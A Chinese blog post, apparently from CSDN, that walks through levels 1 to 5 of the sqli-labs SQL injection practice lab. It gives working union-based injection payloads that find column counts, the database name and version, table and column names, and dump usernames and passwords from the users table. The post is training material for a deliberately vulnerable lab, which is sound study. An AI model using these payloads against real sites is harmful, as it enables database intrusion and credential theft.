sqli-labs(1-75)

最新推荐文章于 2024-05-14 09:57:15 发布
最新推荐文章于 2024-05-14 09:57:15 发布
阅读量889 收藏 24
点赞数 21
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75843485/article/details/136200808
版权

page 1

less-1

判断注入

请输入id作为数值的参数

我们输入id=1判断有没有注入

有注入

尝试改变参数值,将参数值+1或-1,然后查看页面展示的内容是否会变化,如果页面会发生变化,我们就可以初步判断,这个id会带入数据库查询,查询后的内容会显示到页面中来。

后加单引号 

有回显

用--注释掉后面 

显示正常 

说明是字符型注入,因为该页面存在回显,所以我们可以使用联合查询

 联合查询:

第一步:首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数

联合查询会将两条查询语句的查询结果拼接到一起返回!于是反映出联合查询需遵守的一个规则便是,两条查询语句的查询字段数必须相等,于是乎在利用联合查询进行注入的时候我们第一步要做的就是判断后端代码中的SQL查询语句的字段数。

order by + 数字
通过页面状态查看有几列然后通过 union select 判断回显位(注意判断回显位的时候,前面查询的值要为假,不然回显位会被前面查询的结果所占用,导致看不到回显位)

3列

第二步:爆出显示位

就是看看表格里面那一列是在页面显示的。

?id=-1'union select 1,2,3--+

注意 id=-1, 此处 id 的值必须是一个在数据库中 id 字段不存在的值,否则联合查询第一条语句的查询结 果将占据显示位,我们需要的第二条查询语句的查询结果就不能正常显示到浏览器中。

(顺便说一下,搜狗没有火狐好用,从这里开始还是改回了火狐浏览器)

可以看到是第二列和第三列里面的数据是显示在页面的。 

第三步:数据名和版本号

?id=-1'union select 1,database(),version()--+

 

名:security,版本号:5.7.26

第四步:表名
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
information_schema库是 mySQL 自带的一个库,其中包含了当前数据库管理系统的所有信息,但该数据库并不是一个实体的数据库,它不存储任何实际意义上的数据,它只是整个数据库管理系统的一个视图,当某个数据库的某个表发生变化时,information_schema 库中相关的数据将同时发生变化。
在注入中,我们关注的是该库中的schemata tables columns 三个表。他们分别存储了整个数据库 管理系统的所有数据库信息,表信息,字段信息。在schemata 表中,通过 schema_name 字段可以获取所有的 数据库名;在tables, 通过 table_name table_schema 字段可以获取所有的表名与其对应的数据库名;在 columns表中,通过 columns、 table_name table_schema 字段可以获取所有的字段名以及其所属表与数 据库。
我们的注入思路就是先通过 mysql 的内建函数 database(), 获取当前数据库名,再通过 tables 表获取,所有的表信息,再通过columns 表获取上述表所有的字段,最后通过字段查询想要的数据。当然使用information_schema 库查询信息有一个很重要的条件限制,那就是,需要当前连接数据库的用户具有读该数据库的权限

 

四个表名为emails,referers,uagents,users

账号密码应该是在users表中的,所以我们直接爆users的字段名

第五步:字段名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 

 

第六步:查数据

用id分隔一下username和password 

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

 

less-2

判断注入类型

前面过程跟1一样,不说了直接上图

 

数字型注入

步骤

1.判断列数

3列 

2.显示位

2和3列

3.数据库名版本号 

security 

 4.表名

5.字段名

后面的图我不想截了,除了是字符型注入,跟第一道题一模一样

6.查数据

less-3

判断注入类型

 

 

本来以为也是字符型但是看到这里发现不对 

 

 

报错信息里面有括号 

 

sql语句是单引号字符型且有括号

步骤

从这里开始步骤就和前面的一样了,后面的就不用写了直接上结果吧 


?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

 

less-4

判断注入类型

 

 

 

 sql语句是双引号字符型且有括号

步骤

过程都一样

?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

 

less-5

不一样了

字符型

 

这个算是没有回显的,就不能使用联合注入了,可以用布尔盲注

 

2201_75843485
关注
  • 21
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 12万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6431
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs26
qq_53030229的博客
06-01 879
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
SQL注入之sqli-labs
m0_60716947的博客
04-08 7135
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
Docker安装sqli-labs教程
利他者利己,利己者无功。利他利己,利己利他。
07-04 1198
Docker安装sqli-labs教程 这是一篇吃低保的水文 前提条件:安装Docker 传送门:Ubuntu 20 安装docker - https://blog.csdn.net/weixin_42250835/article/details/118350609 搜索sqli-labs docker search sqli-labs 拉取镜像 docker pull acgpiano/sqli-labs 查看镜像 docker images 运行镜像 docker ru
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
安装sqli-labs
10-22
安装sqli-labs
SQL常用函数
weixin_64842400的博客
05-11 387
1、CURDATE() / CURRENT_DATE 返回当前日期2、CURRENT_TIME()/CURTIME() 返回当前时间3、CURRENT_TIMESTAMP 返回当前日期+时间4、DATE()从日期或日期时间表达式中提取日期值5、DATEDIFF(d1,d2)计算日期 d1->d2 之间相隔的天数6、DATE_FORMAT按表达式 f的要求显示日期 d7、UNIX_TIMESTAMP()得到时间戳 8、FROM_UNIXTIME()时间戳转日期 二、字符串相关函数 1、CONCAT(
继续SQL
qq_47966193的博客
05-09 538
● 例如:datediff('2021-06-08','2021-06-01')返回7,datediff('2021-06-08 23:59:59','2021-06-01 21:00:00')返回7,datediff('2021-06-01','2021-06-08')返回-7。● 例如:year('2021-08-03')返回2021,month('2021-08-03')返回8,day('2021-08-03')返回3。
qt中使用QSqlite数据库时,使用QSqlTableModel不显示数据的情况
最新发布
weixin_43640730的博客
05-14 143
QSqlTableModel需要先打开数据库的连接
Flask SQLAlchemy 技术指南
Code掘金的博客
05-09 667
Flask SQLAlchemy 是一个将 SQLAlchemy 集成到 Flask 应用中的扩展。SQLAlchemy 是一个功能强大的 ORM 库,支持多种数据库后端,包括 SQLite、PostgreSQL、MySQL 等。通过 Flask SQLAlchemy,我们可以使用 Python 类和对象来操作数据库,而无需编写大量的 SQL 语句。通过这篇文章,我们了解了 Flask SQLAlchemy 的基本用法,并通过示例代码展示了如何定义数据库模型、向数据库添加数据、以及查询数据。
MY SQL 实验四:
weixin_51590201的博客
05-08 582
2) 在Connection Name 命名 连接名例如con1,其他都按默认的方式,password部分:点击Store in Vault..,在跳出的窗口中的password输入密码,无就按回车。1. SQL Development (用于连接现有的数据库,运行SQL脚本,管理数据库对象等)通过该实验掌握较复杂的SQL 查询数据库方法,包括嵌套查询,相关与不相关子查询,连接的多种方法等。例如 查找员工上级(经理)的姓名 (参考教科书例子 查询每一门课的间接先修课(即先修课的先修课))
[NSSRound#1 Basic]sql_by_sql
Jay17的博客
05-09 365
[NSSRound#1 Basic]sql_by_sql
python连接SQL Server数据库的几点建议
ISDF工软未来
05-08 333
2、换一个办法,或许会有用,即用pyodbc ,就是要注意控制面板中查一下ODBC数据源中的驱动程序中是否有ODBC Driver 17 for SQL Server,没有就找以下位置去安装。
写SQL的心得
weixin_64842400的博客
05-11 429
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
sqli-labs通关1-5
09-03
- *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值